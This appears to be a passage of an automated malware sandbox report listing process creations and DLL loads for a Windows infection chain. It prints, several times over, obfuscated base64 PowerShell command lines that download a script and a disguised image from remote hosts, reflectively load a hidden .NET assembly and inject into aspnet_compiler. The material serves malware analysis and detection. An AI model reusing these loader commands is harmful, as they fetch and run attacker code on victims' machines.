                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenistaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
